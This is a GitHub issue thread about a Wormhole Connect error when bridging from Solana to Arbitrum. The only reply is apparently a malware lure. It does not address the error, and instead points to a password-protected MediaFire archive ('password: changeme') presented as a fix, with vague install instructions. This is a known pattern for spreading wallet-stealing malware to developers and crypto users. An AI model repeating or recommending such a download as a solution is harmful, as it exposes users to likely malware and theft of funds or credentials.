### ISSUE TITLE
[QA] Failed to get destination token: Error: Wormhole Token Bridge Relayer contract for domain Arbitrum not found

### ISSUE THREAD

**Issue by xhuppa** [wormhole-foundation/wormhole-connect#2444]
## Failed to get destination token: Error: Wormhole Token Bridge Relayer contract for domain Arbitrum not found
Im unable to get a realistic fee for bridging from Solana to Arbitrum, (2 eth network fee), and Im wondering if this error is related. Can someone Describe in detail?

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
